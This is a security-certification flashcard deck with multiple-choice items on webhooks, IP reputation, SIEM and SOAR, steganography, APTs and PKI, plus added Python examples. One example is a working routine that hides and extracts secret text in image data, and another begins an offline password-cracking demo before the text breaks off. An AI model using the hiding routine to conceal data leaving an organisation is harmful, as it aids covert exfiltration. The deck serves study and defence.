You are a cyber security consultant for your company. Developers are creating an e-commerce application with a trial version and a paid version. You must recommend a solution that will automatically update the user’s trial subscription to the paid version once the user makes the purchase and the payment is processed.

Which solution should you recommend?

A)Integrate webhooks that will update the user's trial version to the premium version.
B)Integrate plugins that will update the user's trial version to the premium version.
C)Integrate an API that will update the user's trial version to the premium version.
D)Integrate applets that will update the user's trial version to the premium version.

A

You should recommend integrating webhooks into the application that will automatically update the trial version to the paid version when the payment is successfully processed. The webhook is triggered when the payment processor notifies the application that the payment is complete, and not when the payment fails or the payment session times out. Because the webhook endpoint is reachable from the Internet, it must verify that each delivery really came from the payment processor (typically by checking a signature over the request body) and ignore repeated deliveries of the same event before it upgrades anyone; otherwise an attacker who can reach the endpoint can upgrade accounts for free.
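An added Python example, not from the original card, of the receiving side of such a webhook: the handler verifies an HMAC-SHA256 signature over the raw body within a timestamp window, ignores duplicate deliveries, and upgrades the plan only for a successful-payment event. The signature header format, the event field names, and the secret are assumptions modelled on common processor schemes; check your provider's documentation for the real ones.

```python
import hashlib
import hmac
import json
import time

# Hypothetical shared secret as issued by a payment processor's dashboard.
WEBHOOK_SECRET = b"whsec_example_only_change_me"
TOLERANCE_SECONDS = 300  # reject deliveries whose timestamp is older than this


def sign(body, secret, timestamp):
    """HMAC-SHA256 over "<timestamp>.<raw body>", hex encoded.

    Mirrors a Stripe-style scheme; the exact layout a given processor uses is
    an assumption here, so confirm it against your provider's docs.
    """
    msg = str(timestamp).encode() + b"." + body
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


def make_delivery(event, secret, timestamp):
    """Build (raw_body, signature_header) the way the processor would send it."""
    body = json.dumps(event, separators=(",", ":")).encode()
    return body, "t=%d,v1=%s" % (timestamp, sign(body, secret, timestamp))


def verify(body, header, secret, now=None):
    """True only if the 't=<ts>,v1=<hex>' header is fresh and authentic.

    The signature is checked over the raw bytes (never over re-serialised
    JSON), with a constant-time compare; the timestamp window bounds replay.
    """
    try:
        fields = dict(kv.split("=", 1) for kv in header.split(","))
        ts = int(fields["t"])
        sig = fields["v1"]
    except (ValueError, KeyError):
        return False
    now = time.time() if now is None else now
    if abs(now - ts) > TOLERANCE_SECONDS:
        return False
    return hmac.compare_digest(sign(body, secret, ts), sig)


class SubscriptionStore:
    """In-memory stand-in for the application's subscription table."""

    def __init__(self):
        self.plans = {}           # user_id -> "trial" | "paid"
        self.seen_events = set()  # processed event ids, for idempotency

    def handle_webhook(self, body, header, secret, now=None):
        """Process one delivery and return a short status string."""
        if not verify(body, header, secret, now):
            return "rejected: bad signature or stale timestamp"
        event = json.loads(body)
        if event["id"] in self.seen_events:
            return "ignored: duplicate delivery"  # processors retry; never act twice
        self.seen_events.add(event["id"])
        if event["type"] == "payment.succeeded":
            self.plans[event["user_id"]] = "paid"
            return "upgraded"
        # payment.failed, session.expired and the like leave the trial untouched
        return "no-op: " + event["type"]


if __name__ == "__main__":
    store = SubscriptionStore()
    store.plans["user_42"] = "trial"
    now = int(time.time())
    body, header = make_delivery(
        {"id": "evt_001", "type": "payment.succeeded", "user_id": "user_42"},
        WEBHOOK_SECRET, now)
    print(store.handle_webhook(body, header, WEBHOOK_SECRET), store.plans)
    print(store.handle_webhook(body, header, WEBHOOK_SECRET))         # duplicate
    print(store.handle_webhook(body + b" ", header, WEBHOOK_SECRET))  # tampered
```

In a real deployment the seen-event set lives in the database alongside the plan change, inside one transaction, so that a crash between the two cannot leave an event marked as processed without the upgrade having happened.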

52
Q

API

A

An application programming interface (API) is a web service that enables your application to interact with a database, other applications, and other platforms. Your application can be your SaaS product or an e-commerce website. While an API can be used for functions such as displaying dynamic data in your application (the API is called to fetch the information from the database and display it), in this scenario it cannot by itself react to the payment event and upgrade the subscription; something has to notify the application that the payment completed.

53
Q

PlugIns

A

Plugins are small reusable components or programs that can be added to a web application for additional functionality; for example, WordPress plugins extend what a WordPress site can do. A plugin does not by itself react to the payment processor's notification, so in this scenario plugins cannot automate the subscription upgrade upon payment.

54
Q

Applets

A

An applet is a small program coded to perform a specific function within a larger application. Applets are mostly associated with the Java programming language (and Java browser applets are deprecated and no longer run in modern browsers). Applets provide limited functionality and cannot be used to automate the subscription upgrade upon payment.

55
Q

You have observed that your network has fended off breach attempts from the same IP address several times recently. Which of the following could you use to address the issue?

A)Strings
B)AbuseIPDB
C)VirusTotal
D)Joe Sandbox

A

AbuseIPDB is a project dedicated to helping combat hackers, spammers, and abusive activity on the Internet by providing a central blacklist where webmasters, system administrators, and other interested parties can report and look up IP addresses associated with malicious activity online. Much as domain reputation services rate DNS domains known for sending malicious traffic, AbuseIPDB reports on IP addresses and address ranges with a bad reputation for hacking attempts or other malicious behavior. Each address carries an abuse confidence score that you can use to decide whether to block it at the firewall, and you can report the offending address yourself so that others benefit. (WHOIS, by contrast, returns registration and contact data for a domain or address block, not a reputation.)
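
The workflow the card describes, as an added Python example that is not part of the original flashcard deck: filter out addresses that must never leave the organization, build the AbuseIPDB check and report requests (built but not sent here, so the script runs offline), and turn a check response into a block decision. The API key, the offender list, the sample response and the 198.51.100.0/24 "own range" are constructed placeholders; the endpoint paths, header names, response fields and category IDs follow AbuseIPDB's published API v2 documentation at the time of writing and should be verified against the current docs.

```python
import ipaddress
import json
import urllib.parse
import urllib.request

API = "https://api.abuseipdb.com/api/v2"
API_KEY = "REPLACE_ME"          # hypothetical; a real key comes from the AbuseIPDB account page
BLOCK_THRESHOLD = 75            # abuseConfidenceScore (0-100) at which we block

# Addresses we must never report: RFC 1918 space plus, as an assumption,
# 198.51.100.0/24 standing in for the organisation's own public range.
NO_REPORT = [ipaddress.ip_network(n) for n in
             ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "198.51.100.0/24")]

# AbuseIPDB category IDs from its public category table
# (18 Brute-Force, 22 SSH, 14 Port Scan); verify against the current list.
CATEGORIES = {"ssh-bruteforce": [18, 22], "portscan": [14]}

# Constructed: offenders as they might come out of a firewall log summary.
OFFENDERS = {"203.0.113.45": "ssh-bruteforce", "192.0.2.7": "portscan",
             "198.51.100.77": "portscan", "10.0.0.5": "ssh-bruteforce"}

# Constructed response in the shape documented for GET /api/v2/check.
SAMPLE_CHECK = {"data": {"ipAddress": "203.0.113.45", "abuseConfidenceScore": 100,
                         "totalReports": 42, "isWhitelisted": False}}


def reportable(offenders):
    """Drop internal and own-range addresses before anything leaves the org."""
    return {ip: cat for ip, cat in offenders.items()
            if not any(ipaddress.ip_address(ip) in net for net in NO_REPORT)}


def check_request(ip, max_age_days=90):
    """Build (but do not send) the reputation lookup for one address."""
    qs = urllib.parse.urlencode({"ipAddress": ip, "maxAgeInDays": max_age_days})
    return urllib.request.Request(f"{API}/check?{qs}",
                                  headers={"Key": API_KEY, "Accept": "application/json"})


def should_block(check_response, threshold=BLOCK_THRESHOLD):
    """Block on a high confidence score unless AbuseIPDB has whitelisted the IP
    (shared infrastructure such as large CDNs, where blocking causes collateral damage)."""
    d = check_response["data"]
    return d["abuseConfidenceScore"] >= threshold and not d.get("isWhitelisted", False)


def report_request(ip, category, comment):
    """Build (but do not send) a report. Keep the comment free of internal
    hostnames and usernames: it is published alongside the report."""
    form = urllib.parse.urlencode({"ip": ip,
                                   "categories": ",".join(map(str, CATEGORIES[category])),
                                   "comment": comment}).encode()
    return urllib.request.Request(f"{API}/report", data=form, method="POST",
                                  headers={"Key": API_KEY, "Accept": "application/json"})


def plan(offenders):
    """Which addresses we would look up/report and which we skip as our own."""
    safe = reportable(offenders)
    return {"report": sorted(safe), "skipped": sorted(set(offenders) - set(safe))}


if __name__ == "__main__":
    print(json.dumps(plan(OFFENDERS), indent=2))
    req = check_request("203.0.113.45")
    print(req.full_url, "->", "block" if should_block(SAMPLE_CHECK) else "allow")
    print(report_request("203.0.113.45", "ssh-bruteforce", "SSH brute force, 4 hits in 2 min").data)
```

The own-range filter is the step most often forgotten: an automated reporter that submits its own NAT address after a misconfigured scanner trips the firewall will get that address blocklisted by everyone else who consumes the feed.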

56
Q

Strings

A

Strings is a utility that searches a file (typically an executable) for runs of printable ASCII and Unicode characters. It ignores context and formatting, so it can analyze any file type and find strings anywhere in the file; the flip side is that any run of bytes that happens to fall in the printable range, such as a few machine-code opcodes, is reported as a string too. Analysts use it as a quick first pass for hard-coded URLs, file paths, registry keys, and command lines in a suspect binary.

57
Q

VirusTotal

A

VirusTotal is an online service that compares a suspect file, or just its hash, against dozens of antivirus engines and its database of previously analyzed samples, and runs behavioral analysis on submitted files. The resulting report shows which engines detect the file, what they call it, and details of the code's functioning, which makes further examination easier. Look up the hash before uploading the file itself: submitted samples are shared with the security community, so uploading a document that contains confidential data can itself be a disclosure.

58
Q

Joe Sandbox

A

Joe Sandbox detects and analyzes potential malicious files and URLs on Windows, Android, macOS, Linux, and iOS for suspicious activities. It performs deep malware analysis and generates comprehensive and detailed analysis reports.

59
Q

Which of the following is NOT a consideration when establishing the confidence level in the findings of a vulnerability scan?

A)accuracy of scan results
B)relevance of scan results
C)cost of scan results
D)timeliness of scan results

A

While it is true that security initiatives, such as a vulnerability scan, must create value that exceeds the cost, the cost of obtaining the scan results is not a consideration when establishing the confidence level in the findings.

The accuracy of the results is perhaps the most important consideration when establishing the confidence level. Inaccurate results can lead to wasted effort on noncritical issues, while more critical issues are left unaddressed.

The relevance of the results is also a consideration when establishing the confidence level, because in some cases results may indicate an issue that, while present, is irrelevant. For example, a missing patch for SQL Server is irrelevant when the organization uses Oracle.

Finally, the timeliness of the results is a consideration. Older results may no longer reflect the current state: findings may have been patched since the scan, and vulnerabilities disclosed after it will be missing, so the longer the gap between a scan and the decisions based on it, the less confidence its findings deserve.

60
Q

A recent attack was allowed to continue longer than it should have because the cybersecurity team was slowed by the need to locate and read the security logs on the infrastructure devices through which the attack flowed.

During the lessons learned meeting, mitigations for this problem were discussed. Which of the following would allow you to not only centralize the logs but also centralize their analysis for security issues?

A)SCADA
B)SIEM
C)Syslog
D)NetFlow

A

Security information and event management (SIEM) software can collect logs from specified devices, combine the logs, and analyze the combined logs for security issues. By doing so, they can identify attacks that would be more difficult to identify otherwise.
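
The correlation the card alludes to, as an added Python example that is not from the original deck: two devices log in different formats, the events are normalized to one timeline, and a rule fires on a pattern neither log shows on its own (repeated SSH failures followed by a success, then that same source reaching an internal host on a lateral-movement port). The log lines, hostnames and addresses are constructed; both devices are assumed NTP-synchronized and logging in UTC, and the firewall's year-less syslog stamp is assumed to be 2024.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Constructed log lines from two devices in their native formats.
AUTH_LOG = """\
2024-03-03T10:00:05Z vpn1 sshd[2210]: Failed password for admin from 203.0.113.45 port 51122 ssh2
2024-03-03T10:00:09Z vpn1 sshd[2210]: Failed password for admin from 203.0.113.45 port 51123 ssh2
2024-03-03T10:00:14Z vpn1 sshd[2211]: Failed password for root from 203.0.113.45 port 51124 ssh2
2024-03-03T10:00:31Z vpn1 sshd[2215]: Accepted password for admin from 203.0.113.45 port 51130 ssh2
2024-03-03T10:05:00Z vpn1 sshd[2290]: Accepted publickey for alice from 192.0.2.7 port 40001 ssh2
"""
FW_LOG = """\
Mar 03 10:00:02 fw1 kernel: DROP SRC=203.0.113.45 DST=198.51.100.10 DPT=22
Mar 03 10:00:03 fw1 kernel: ACCEPT SRC=203.0.113.45 DST=198.51.100.20 DPT=22
Mar 03 10:00:40 fw1 kernel: ACCEPT SRC=203.0.113.45 DST=198.51.100.30 DPT=445
Mar 03 10:04:58 fw1 kernel: ACCEPT SRC=192.0.2.7 DST=198.51.100.20 DPT=22
"""
AUTH_RE = re.compile(r"^(\S+) (\S+) sshd\[\d+\]: (Failed|Accepted) \S+ for (?:invalid user )?(\S+) from (\S+)")
FW_RE = re.compile(r"^(\w{3} \d\d \d\d:\d\d:\d\d) (\S+) kernel: (DROP|ACCEPT) SRC=(\S+) DST=(\S+) DPT=(\d+)")
LATERAL_PORTS = {"445", "3389", "5985"}   # SMB, RDP, WinRM


@dataclass
class Event:
    ts: datetime
    device: str
    kind: str          # auth_fail | auth_ok | fw_drop | fw_accept
    src: str
    user: str = ""
    dst: str = ""
    dport: str = ""


def parse_auth(text):
    for line in text.splitlines():
        m = AUTH_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m[1], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        yield Event(ts, m[2], "auth_fail" if m[3] == "Failed" else "auth_ok", m[5], user=m[4])


def parse_fw(text, year=2024):
    for line in text.splitlines():
        m = FW_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m[1], "%b %d %H:%M:%S").replace(year=year, tzinfo=timezone.utc)
        yield Event(ts, m[2], "fw_drop" if m[3] == "DROP" else "fw_accept", m[4], dst=m[5], dport=m[6])


def correlate(events, fail_threshold=3, window=timedelta(minutes=10)):
    """Rule: >= fail_threshold auth failures followed by a success from the same
    source within the window; escalate if the firewall then sees that source
    reach an internal host on a lateral-movement port."""
    by_src = {}
    for e in sorted(events, key=lambda e: e.ts):
        by_src.setdefault(e.src, []).append(e)
    alerts = []
    for src, evs in by_src.items():
        for ok in (e for e in evs if e.kind == "auth_ok"):
            fails = [e for e in evs if e.kind == "auth_fail" and ok.ts - window <= e.ts < ok.ts]
            if len(fails) < fail_threshold:
                continue
            lateral = [(e.dst, e.dport) for e in evs
                       if e.kind == "fw_accept" and ok.ts < e.ts <= ok.ts + window
                       and e.dport in LATERAL_PORTS]
            alerts.append({"src": src, "user": ok.user, "failures": len(fails),
                           "severity": "critical" if lateral else "high",
                           "lateral": lateral, "devices": sorted({e.device for e in evs})})
    return alerts


def run():
    return correlate(list(parse_auth(AUTH_LOG)) + list(parse_fw(FW_LOG)))


if __name__ == "__main__":
    for alert in run():
        print(alert)
```

The time normalization step is where most home-grown correlation breaks: a firewall ten minutes adrift would move the SMB connection outside the window and silently downgrade the alert.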

61
Q

Which of the following is a system that has been isolated from the other systems and is used for analyzing suspicious files and messages for malware?

A)Honeypot
B)Sheep dip computer
C)Sandbox
D)Virtual machine

A

One option for studying malware is to set up a sheep dip computer. This is a system that has been isolated from the other systems and is used for analyzing suspicious files and messages for malware.

62
Q

You are a cybersecurity analyst for your organization. You are in the process of implementing Security Orchestration Automation and Response (SOAR) tools that will collect data about security threats from various sources and respond to security incidents in an automated manner.

Which of the following statements is NOT true of a SOAR solution?

A)It creates a knowledge base and helps organizations to avoid and deal with security threats.

B)It analyzes collected data, identifies patterns, and automatically assesses and triggers alerts for appropriate action and response.

C)It receives alerts about security incidents and responds to each incident.

D)It provides a fully automated workflow from alert validation through playbook activation.

A

A SOAR solution does not itself analyze collected data to identify patterns and then automatically assess and trigger alerts for action and response. These functions are performed by a security information and event management (SIEM) solution. SIEM technology collects event log data from a range of sources, identifies activity that deviates from the norm with real-time analysis, and raises alerts; SOAR consumes those alerts and drives the response.

63
Q

What are the three components of SOAR?

A

SOAR is a software technology platform that enables organizations to collect relevant data about security threats and respond to security events with minimal human intervention. SOAR platforms combine three components:

Security orchestration
Security automation
Security response

64
Q

What are the three capabilities of SOAR?

A

A SOAR solution has the following capabilities:

Provides a fully automated workflow from alert validation through playbook activation.
Creates a knowledge base and helps the organization avoid and manage security threats.
Receives alerts about security incidents and responds automatically to the incident.

65
Q

SOAR helps organizations improve the efficiency and effectiveness of their security operations by?

A

SOAR provides advanced threat protection and acts as a vital component of security operations across various divisions of the organization. Organizations use SOAR to monitor threat investigations and responses, for security intelligence management, and for security operations center (SOC) optimization. SOAR helps organizations improve the efficiency and effectiveness of their security operations by:

Improving response time to security incidents

Facilitating the investigation process

Integrating disparate threat protection technologies into a unified dashboard

Minimizing the impact caused by attacks

Managing and reporting security threats

Visualizing meaningful information through dashboards

Reducing operating costs

66
Q

SOAR vs SIEM

A

SOAR is designed to automate and orchestrate incident response processes, streamlining workflows and enabling faster responses to security incidents. Conversely, SIEM primarily focuses on collecting, analyzing, and correlating security event data to provide insights and detect threats in real-time.

67
Q

Recently your network was attacked, and the attack had the following characteristics:

It appeared to be directed at your organization specifically.
It was carried out over a long period of time.
It appeared to originate from multiple sources.
The attack targeted specific assets.
The team is performing threat classification. Which of the following is the best description of this attack?

A)APT
B)passive
C)known
D)zero-day

A

The attack described has all the elements of an advanced persistent threat (APT). An APT is a hacking process that targets a specific entity and is carried out over a long period of time. In most cases, the victim of an APT is a large corporation or government entity. The attacker is usually a group of organized individuals or a hostile government.

In an APT, the attackers have a pre-defined objective, such as a specific asset belonging to your organization (including smartcard credentials, control of social media logins, a database of PII, and so on). Once the objective is met, the attacks stop. APTs can often be detected by monitoring logs and network performance metrics.

68
Q

passive vs active attacks?

A

A passive attack is one in which the attacker only captures information but does not take any actions or send any data on the network. APT attacks are active attacks in which actions are taken by the attacker. However, APTs typically begin with passive reconnaissance.

69
Q

A new addition was made recently to the secure part of the company website. Now, when new users are creating an account, they are prompted to identify the letters in a grainy graphic. What is this process called?

A)NAC
B)Jump box
C)CAPTCHA
D)SSO

A

A Completely Automated Public Turing Test to Tell Computers and Humans Apart (CAPTCHA) system uses a graphic that is difficult for a bot to read but not for a human, to ensure that bots (automated processes used by attackers to mass-create accounts) are not allowed to create accounts.

70
Q

Which research source can help in discovering new vulnerabilities and potential threats in existing Internet standards?

A)TTPs
B)STIX
C)TAXII
D)RFCs

A

A Request for Comments (RFC) is often issued when a new technology or practice is proposed within the Internet community; it represents a call for peer review on the subject. RFCs are published by the RFC Editor on behalf of the Internet Engineering Task Force (IETF) and its related bodies (the IAB and IRTF, plus independent submissions). The National Institute of Standards and Technology (NIST) does not issue RFCs; it publishes its own Special Publications and FIPS standards, which are a separate research source.

71
Q

TTP

A

TTP stands for tactics, techniques, and procedures. It describes the patterns of behavior a threat actor exhibits, which defenders use to recognize and defend against the strategies and threat vectors those actors employ. TTPs are a way of classifying observed behavior, not a place to discover new vulnerabilities.

72
Q

STIX

A

Structured Threat Information eXpression (STIX) defines a common language for discussing threat intelligence and serializes it into a coherent format. It is a tool for spreading information about vulnerabilities, not a research source.

73
Q

TAXII

A

TAXII stands for Trusted Automated eXchange of Indicator Information. It was designed to specifically support STIX by defining how cyber-threat information can be shared via services and message exchanges. STIX and TAXII are both tools for sharing research, not research sources.

74
Q

An organization recently suffered a data breach. When the issue was investigated, the organization found that a disgruntled employee concealed product release dates within an image file he sent to someone else. What is this process called?

A)double tagging
B)masquerading
C)data exfiltration
D)steganography

A

Steganography is the process of hiding data inside another file, most often a graphic, by replacing bits the cover file barely depends on (typically the least significant bit of each pixel value) with the bits of the secret. This swapping does not have a noticeable effect on the graphic, but it allows the sender to hide data that the recipient can extract later with the same application used to insert it. The best defense against steganography is to periodically scan PCs for questionable software. The presence of steganography software on any system should be prohibited unless it is specifically required for business purposes.
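
Least-significant-bit embedding as the card describes it, as an added Python example that is not part of the original deck. The cover is a constructed 8-bit grayscale gradient standing in for decoded pixel data (a real image would be loaded with an image library), the secret is a constructed string, and the final function is a deliberately naive detector showing why LSB embedding is visually invisible yet statistically visible.

```python
# Constructed cover: a smooth 8-bit grayscale gradient (3000 samples) standing
# in for decoded pixel data; a real image would be loaded with an image library.
COVER = bytes((i // 4) % 256 for i in range(3000))
SECRET = b"Release date: 2024-09-17; codename ORCHID"


def embed(cover: bytes, payload: bytes) -> bytes:
    """Write a 4-byte length prefix and the payload into the LSB of each sample."""
    data = len(payload).to_bytes(4, "big") + payload
    bits = [(byte >> shift) & 1 for byte in data for shift in range(7, -1, -1)]
    if len(bits) > len(cover):
        raise ValueError("cover too small for payload")
    out = bytearray(cover)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit       # replace only the lowest bit
    return bytes(out)


def _read(stego: bytes, nbytes: int, start: int) -> bytes:
    vals = bytearray()
    for k in range(nbytes):
        byte = 0
        for j in range(8):
            byte = (byte << 1) | (stego[start + 8 * k + j] & 1)
        vals.append(byte)
    return bytes(vals)


def extract(stego: bytes) -> bytes:
    length = int.from_bytes(_read(stego, 4, 0), "big")
    return _read(stego, length, 32)


def max_sample_change(a: bytes, b: bytes) -> int:
    """How far any sample moved: LSB embedding never changes a value by more than 1."""
    return max(abs(x - y) for x, y in zip(a, b))


def lsb_transition_rate(samples: bytes, n: int) -> float:
    """Naive detector: fraction of neighbouring samples whose LSBs differ.
    Smooth image regions have few transitions; embedded bits look random."""
    region = samples[:n]
    flips = sum((region[i] ^ region[i + 1]) & 1 for i in range(len(region) - 1))
    return flips / (len(region) - 1)


if __name__ == "__main__":
    stego = embed(COVER, SECRET)
    n = 8 * (4 + len(SECRET))
    print(extract(stego), max_sample_change(COVER, stego))
    print(f"cover {lsb_transition_rate(COVER, n):.2f} stego {lsb_transition_rate(stego, n):.2f}")
```

Production steganalysis uses chi-square or RS analysis rather than this transition count, but the principle is the same: the image looks identical while the bit-plane statistics do not, which is why scanning for stego tools on endpoints is paired with DLP inspection of outbound images.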

75
Q

Double Tagging

A

This is not double tagging. Double tagging is an attack in which a malicious individual sends frames carrying two 802.1Q tags so that a switch forwards them onto a VLAN the attacker is not a member of. Double-tagging attacks can be prevented by keeping the native VLAN of the trunk ports different from any user VLAN and by configuring switches to tag native-VLAN traffic.

76
Q

Masquerade

A

This is not masquerading. In the networking sense, masquerading is when a single public IP address is used on behalf of all interior devices when they access the Internet, a form of Network Address Translation (NAT). It is called masquerading because none of the interior devices reveals its private IP address to the outside world. (In an access-control context, masquerading means impersonating another user or system; neither meaning describes hiding data in an image.)

77
Q

Several of the systems you manage are displaying odd behavior. You are trying to determine if the issue is host-related or application-related. Which of the following is a host-related issue?

A)anomalous activity
B)introduction of new accounts
C)unexpected output
D)registry changes

A

Changes to the registry or anomalies in the registry settings are a host-related issue, because these settings affect the entire system rather than a single application.

78
Q

What behaviours are deemed odd when it comes to applications?

A

Anomalous activity, such as an application shutting down unexpectedly, is an application-related issue.

When new accounts for an application appear, it is an application-related issue. It is also an indication of a serious security issue, as adding accounts probably requires administrator rights.

When a program begins to display unexpected output, such as a strange new dialog box, it is an indication of an application-related security issue. In many cases this is an indication that a malware infection has occurred.

79
Q

Your company needs to ensure that all devices connecting to the network are prevented from introducing malware and other vulnerabilities into the network. This includes deploying patch management for systems and applications and hardening systems. What technique are you implementing?

A)System isolation
B)Endpoint security
C)Network segmentation
D)Sinkholes

A

You are implementing endpoint security. Endpoint security involves protecting the endpoints (workstations, printers, and so on) in the network, including protecting them from other endpoints that spend at least some of the time outside the LAN. This is done by verifying patches and updates before the device is allowed access to the network. Endpoint security also includes the process of hardening endpoints.

80
Q

Sinkhole

A

You are not implementing a sinkhole. A sinkhole is a routing mechanism that can route traffic from a device being flooded to a location where the traffic can be studied.

81
Q

Upon returning from a security seminar, the CEO is very concerned about social engineering attacks. Which of the following is NOT a social engineering attack?

A)dumpster diving
B)obfuscated links
C)SYN floods
D)piggybacking

A

A SYN flood is a denial-of-service (DoS) attack that exhausts a server's half-open TCP connection table by sending many SYN packets without completing the handshake. It is a purely technical attack that manipulates no person, so it has nothing to do with social engineering.

82
Q

You are investigating the symptoms displayed by a device in your network. The system is experiencing very high consumption of bandwidth during a time when there should not be a heavy workload on the device. Which issue is the most likely cause?

A)buffer overflow
B)rogue devices
C)ping sweep
D)DoS attack

A

While all of these issues should be a concern, when heavy bandwidth consumption is detected in the network the most likely cause is a denial-of-service (DoS) attack. High bandwidth usage is the key symptom of a DoS attack. The best course of action is to identify the source of the traffic and block it at the firewall. Going forward, you should prevent all traffic from outside the network that uses a source address that is a private address, keep all anti-malware up to date, and ensure that users are trained in safe practices.

83
Q

Which attack makes a device suddenly become unavailable rather than causing a surge in bandwidth?

A

A buffer overflow would not typically cause a surge in bandwidth usage. When these attacks occur, the affected process or device usually crashes, so the symptom of a buffer overflow is a service or device suddenly becoming unavailable. If this occurs, all applications exposed on the device should be checked for proper input validation and bounds checking.

A buffer overflow occurs when a program writes more data into a fixed-size buffer than the buffer can hold, overwriting adjacent memory. Most buffer overflows result from the combination of direct memory manipulation (as in C and C++, which do not bounds-check writes) and mistaken assumptions about the size or composition of incoming data.

84
Q

Which process allows you to deploy, configure, and manage data centers through scripts?

A)Waterfall
B)IaC
C)Agile
D)Immutable systems
E)Baselining

A

Infrastructure as code (IaC) is the process of using definition and configuration files to provision and manage data centers. Automating this process through scripts can ensure that there is more control and less opportunity for error when deploying servers, as compared with manual configuration. IaC is the foundation for Secure DevOps. Secure Development Operations (Secure DevOps) means that security is built into all your development operations.

85
Q

Water Fall

A

Waterfall is a development framework that uses tightly defined processes that are executed in a linear sequence.

86
Q

Agile

A

Agile is a cyclical methodology where development phases are iterative, and each cycle moves the project a little closer to the final product.

87
Q

Immutable

A

Immutable systems are those whose configuration is fixed once deployed: changes are made by building and deploying a new instance rather than modifying the running one, which makes drift and unauthorized changes easier to detect.

88
Q

Which of the following is NOT associated with public key infrastructure (PKI)?

A)Certificate store
B)Registration authority
C)Certificate authority
D)Single sign-on

A

Single sign-on (SSO) is not associated with PKI. It is a process that allows users to authenticate once to the network and thereafter access resources without being prompted for credentials again.

The certificate authority (CA) is an element of PKI. The CA issues and signs certificates, vouching for the binding between a public key and the identity named in the certificate.

The registration authority (RA) validates the identity of the entity requesting a certificate and then directs the CA to issue it; the RA does not sign certificates itself.

The certificate store is used by applications running on a system to retrieve stored certificates, certificate trust lists, and certificate revocation lists.

Another element of PKI is the certificate database. This database stores information about the certificate, as well as the validity status and the validity period.

89
Q

Your company has engaged with a threat intelligence sharing organization. In which of the following areas would you identify and share your controls chosen to address issues?

A)vulnerability management
B)security engineering
C)incident response
D)detection and monitoring
E)risk management

A

Part of risk management is identifying mitigations, called controls, to address issues. Examples of the types of controls are:

Preventative controls: controls that stop something from occurring, such as locks.

Managerial controls: controls that specify acceptable practices within an organization, such as acceptable use policies.

Corrective controls: controls put in place to reduce the effect of an attack or other undesirable event, such as backups.

90
Q

Which of the following vulnerabilities is characterized by a user modifying a browser’s security settings to make it more convenient to visit websites?

A)Misconfiguration/weak configuration
B)Improper input handling
C)Improper error handling
D)Default configuration

A

If a user modifies a browser’s security settings to make it more convenient to visit websites, such as turning off pop-up blockers and anti-phishing controls, this is an example of a weak configuration. Misconfiguration and weak configurations can have a severe impact on the entire organization. Misconfiguration, such as not changing the default administrative user name or password, can also have a significant impact.

91
Q

Improper error handling and default configuration

A

Improper error handling could allow an attacker to crash a program. Error checking should be built into every module or code function. An error should not result in a crashed application but rather generate an error message. Systems and components, such as routers, should never be deployed with the default configuration enabled. As an example, many small office/home office (SOHO) users are thrilled that they got their new wireless network to finally communicate “out of the box.” As a result, they do not change the default administrator information, leaving their network wide open for attack.

92
Q

Which of the following provides extra layers of security for administrator accounts and service accounts?

A)Passwordless
B)Federation
C)Privileged access management
D)Cloud access security broker

A

Privileged access management (PAM) is a process that provides extra protection for roles above the level of regular users, such as an administrator or a service account. If an account that is assigned special access is compromised, that breach can have a more significant impact than a breach of a regular user’s account.

93
Q

Which of the following has Firewall as a Service (FWaaS) as a component?

A)Network segmentation
B)Secure Access Service Edge
C)Software-defined networking
D)On-premises

A

Secure Access Service Edge (SASE) has Firewall as a Service (FWaaS) as one of its components. Other components include secure web gateways (SWG), a cloud access security broker (CASB), and zero trust network access (ZTNA). SASE is used to ensure security in a software-defined wide area network (SD-WAN) environment, particularly in a cloud environment. SASE is often associated with the zero-trust model.

94
Q

SDN

A

Software-defined networking (SDN) allows for dynamic reconfiguration of a network as a reaction to changes in volume, types of traffic, and security incidents.

95
Q

You are assembling tools that you need in your job as a security analyst. You must include a forensic suite tool. Which of the following will satisfy this requirement?

A)DD
B)Burp Suite
C)FTK
D)ZAP

A

FTK will satisfy the requirement of needing a forensic suite tool.

Burp Suite and Zed Attack Proxy (ZAP) are interception proxy tools. Another interception proxy tool is Vega.

dd is an imaging tool. While this type of tool is considered a forensics tool, it does not provide a forensic suite because it performs only one function, which is imaging.

96
Q

Preventive tools

A

Preventative – includes tools that provide intrusion prevention system (IPS), firewall, antivirus, anti-malware, Enhanced Mitigation Experience Toolkit (EMET), web proxy, and web application firewall services. (EMET has been retired by Microsoft; its exploit mitigations are now built into Windows as Exploit Protection under Windows Defender Exploit Guard.)

97
Q

Collective tools

A

Collective – includes tools that provide network scanning, vulnerability scanning, security information and event management (SIEM), packet capture, and intrusion detection system (IDS) services.

98
Q

Analytical Tools

A

Analytical – includes tools that provide vulnerability scanning, monitoring, and interception proxy services.

99
Q

Exploit tools

A

Exploit – includes tools that provide interception proxy, exploit frameworks, and fuzzer services.

100
Q

Forensic Tools

A

Forensics – includes tools that provide forensics, hashing, password cracking, and imaging services.

101
Q

Your team has begun using user behavior analysis to identify potential malicious activity. Which of the following is NOT an example of behavior that might be uncovered using this technique?

A)communication attempts from unusual geographic locations
B)editing of user groups
C)user activity at odd hours
D)breaking the key on a hashed password

A

User behavior analysis and analytics will be of no help when an attacker cracks a hashed password offline. A hashed password is a message digest generated from the password with a hashing algorithm such as SHA-256; hashing involves no key to break, and the digest cannot be reversed directly. Instead, an attacker who has obtained the digest repeatedly hashes candidate passwords until one produces a matching digest. Because the guessing happens on the attacker's own hardware, it generates no logins, no traffic, and no user activity for behavior analytics to observe; salting and a deliberately slow hash (bcrypt, scrypt, Argon2, or PBKDF2) are the controls that matter here.

Any abnormal user behavior can be evidence of a system compromise. Examples include:

Editing of user groups or other abnormal account activity
Communication attempts from unusual geographic locations or impossible travel
User activity at odd hours
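
The offline attack the card describes and the storage design that slows it, as an added Python example that is not part of the original deck. The wordlist and the "leaked" digest are constructed; the storage format (algorithm, iteration count, salt and hash in one record) and the 600,000-iteration default for PBKDF2-HMAC-SHA256 follow the OWASP Password Storage Cheat Sheet recommendation as of 2023.

```python
import hashlib
import hmac
import os

# Constructed: a small wordlist and a "leaked" unsalted SHA-256 digest of a weak password.
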